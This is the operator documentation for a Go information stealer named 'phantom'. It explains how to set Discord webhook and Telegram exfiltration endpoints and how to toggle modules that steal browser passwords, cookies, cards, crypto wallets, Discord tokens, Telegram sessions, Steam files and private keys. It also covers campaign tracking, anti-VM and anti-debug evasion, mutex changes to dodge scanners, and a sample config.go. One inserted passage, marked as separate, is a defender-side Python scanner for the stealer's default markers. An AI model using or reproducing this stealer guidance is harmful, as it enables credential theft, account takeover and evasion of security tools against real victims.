
Overview

All configuration settings are defined in config/config.go. These values must be set before building the stealer binary.
Remember to use garble or similar obfuscation for sensitive values like webhook URLs to avoid static detection.

C2 Configuration

Configure your command and control endpoints for data exfiltration.
At least one C2 method (Discord or Telegram) must be configured or exfiltration will fail.
DiscordWebhook (string, default: "")
    Discord webhook URL - PRIMARY exfiltration method. Format: https://discord.com/api/webhooks/xxxxx/yyyyy. This is the preferred method for receiving stolen data as Discord webhooks are reliable and don’t require bot setup.
TelegramToken (string, default: "")
    Telegram bot token - BACKUP exfiltration method. Only used if Discord fails or isn’t set. Obtain from @BotFather on Telegram.
TelegramChatID (string, default: "")
    Telegram chat ID where data will be sent. Get this from @userinfobot on Telegram by sending /start.

Build Information

Identifiers for tracking and avoiding conflicts.
BuildID (string, default: "phantom-v1.0")
    Build identifier for tracking different campaigns. Change this for each campaign to track which victims came from which distribution method.
MutexName (string, default: "phantom_mtx_7f3a9b2c")
    Mutex name to prevent multiple instances running simultaneously.
    Change this value to avoid detection by mutex scanners and security products that fingerprint known stealer mutexes.
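As an added defender-side example (not part of this page or its project), the following Python scanner looks through a binary or memory dump for the defaults documented in the C2 Configuration and Build Information sections: the Discord webhook URL format and the default BuildID and MutexName strings. The single-byte XOR sweep is a generic analyst heuristic for lightly obfuscated strings, an assumption of this example rather than the scheme the page describes; the sample blob is constructed.

```python
import re

# Defaults documented on this page; an unmodified build still carries them.
DEFAULT_MARKERS = {
    "build_id": b"phantom-v1.0",
    "mutex_name": b"phantom_mtx_7f3a9b2c",
}

# Webhook format documented above: https://discord.com/api/webhooks/<id>/<token>
WEBHOOK_RE = re.compile(rb"https://discord\.com/api/webhooks/\d+/[A-Za-z0-9_-]+")


def xor_variants(marker: bytes):
    """Yield (key, encoded) for every non-zero single-byte XOR key.

    Assumption for this example: a build may hide its strings behind a
    one-byte XOR. This is a generic triage heuristic, not the runtime
    hostname-derived key the page describes.
    """
    for key in range(1, 256):
        yield key, bytes(b ^ key for b in marker)


def scan_for_indicators(data: bytes) -> dict:
    """Return plaintext webhook URLs and (marker, xor_key) hits found in data.

    xor_key 0 means the marker was present in the clear.
    """
    hits = {"webhooks": [], "markers": []}
    for m in WEBHOOK_RE.finditer(data):
        hits["webhooks"].append(m.group().decode("ascii"))
    for name, marker in DEFAULT_MARKERS.items():
        if marker in data:
            hits["markers"].append((name, 0))
            continue
        for key, encoded in xor_variants(marker):
            if encoded in data:
                hits["markers"].append((name, key))
                break
    return hits


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_for_indicators(fh.read())


# Constructed sample blob: a clear-text webhook URL plus the default mutex
# name hidden behind a single-byte XOR with key 0x5A. No build ID is present.
SAMPLE = (
    b"MZ\x90\x00padding"
    + b"https://discord.com/api/webhooks/123456/abcdef"
    + b"\x00" * 4
    + bytes(b ^ 0x5A for b in b"phantom_mtx_7f3a9b2c")
    + b"\x00tail"
)
```

Run `scan_file` over a suspect executable or process dump; a hit on the default mutex name or a webhook URL is a strong triage signal, while a missing hit says nothing about a rebuilt or fully obfuscated sample.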

Module Toggles

Enable or disable specific stealing modules. More modules = more data but also more suspicious behavior.

Data Collection Modules

StealBrowsers (bool, default: true)
    Extract passwords, cookies, credit cards, and browsing history from all supported browsers. Targets Chromium-based browsers (Chrome, Edge, Brave, Opera, etc.) and Firefox-based browsers.
StealCrypto (bool, default: true)
    Steal cryptocurrency wallets - both desktop applications and browser extensions. See Targets for the complete list of supported wallets.
StealDiscord (bool, default: true)
    Extract Discord authentication tokens from desktop clients and browser sessions. Tokens can be used to access accounts without passwords.
StealTelegram (bool, default: true)
    Steal Telegram tdata session files. These files contain session data that can be used to hijack Telegram accounts.
StealSteam (bool, default: true)
    Extract Steam ssfn and config files. These files can be used to bypass Steam Guard on other machines.
TakeScreenshot (bool, default: true)
    Capture a PNG screenshot of the victim’s desktop. Useful for understanding what the victim was doing and identifying additional attack vectors.
GrabSystemInfo (bool, default: true)
    Collect system information including hostname, IP address, hardware specs, and OS details. Provides context about the victim machine for further exploitation.

Danger Zone

These modules are noisier and more likely to trigger detection. Use with caution in production environments.
Persistence (bool, default: false)
    Add stealer to Windows registry and startup folder for persistence across reboots.
    Disabled by default. This is very noisy and will trigger most security products.
SelfDestruct (bool, default: false)
    Delete the executable after successful execution.
    Disabled by default. Helps avoid forensic analysis but may cause issues if exfiltration fails.

Anti-Analysis Features

Recommended to keep both enabled for production builds to evade sandbox and researcher analysis.
AntiVM (bool, default: true)
    Detect and exit if running in a virtual machine. Checks for VMware, VirtualBox, QEMU, Hyper-V, and other common virtualization platforms.
AntiDebug (bool, default: true)
    Detect and exit if a debugger is attached. Prevents dynamic analysis and reverse engineering attempts.

File Grabber Settings

The file grabber searches specific directories for interesting files based on extension filters.
FileGrabber (bool, default: true)
    Enable the file grabber module. Searches configured directories for files matching specified extensions.
FileExtensions ([]string, default: see below)
    List of file extensions to grab from target directories. Default extensions:
      • .txt - Text files
      • .doc - Word documents (legacy)
      • .docx - Word documents
      • .xls - Excel spreadsheets (legacy)
      • .xlsx - Excel spreadsheets
      • .pdf - PDF documents
      • .json - JSON configuration files
      • .csv - CSV data files
      • .db - Generic database files
      • .sqlite - SQLite databases
      • .key - Private key files
      • .pem - PEM certificates/keys
      • .ppk - PuTTY private keys
      • .kdbx - KeePass password databases
      • .rdp - Remote Desktop Protocol files
      • .ovpn - OpenVPN configurations
      • .conf - Generic config files
      • .wallet - Wallet data files
      • .dat - Bitcoin wallet.dat and similar
MaxFileSize (int64, default: 5242880)
    Maximum file size in bytes (default: 5MB). Files larger than this will be skipped to avoid grabbing huge files that could slow down exfiltration. Formula: 5 * 1024 * 1024 = 5,242,880 bytes.
GrabberPaths ([]string)
    Directories to search for files (relative to user home directory). Default paths:
      • Desktop - User desktop folder
      • Documents - User documents folder
      • Downloads - User downloads folder
    These directories typically contain the most valuable data. Additional paths can be added but will increase execution time.

Runtime Configuration

These values are set at runtime and should not be modified manually.
The stealer uses a runtime XOR key derived from the victim’s hostname. This makes static analysis harder since the encryption key isn’t present in the binary.
var xorKey []byte

func SetKey(key []byte) {
    xorKey = key
}

func GetKey() []byte {
    return xorKey
}

Example Configuration

package config

// C2 Configuration
var (
    DiscordWebhook = "https://discord.com/api/webhooks/123456/abcdef"
    TelegramToken  = ""
    TelegramChatID = ""
)

// Build Info
var (
    BuildID   = "campaign-january-2026"
    MutexName = "phantom_custom_mutex_a1b2c3d4"
)

// Module Toggles
var (
    StealBrowsers  = true
    StealCrypto    = true
    StealDiscord   = true
    StealTelegram  = true
    StealSteam     = true
    TakeScreenshot = true
    GrabSystemInfo = true
    
    Persistence  = false
    SelfDestruct = false
    
    AntiVM    = true
    AntiDebug = true
    
    FileGrabber = true
)
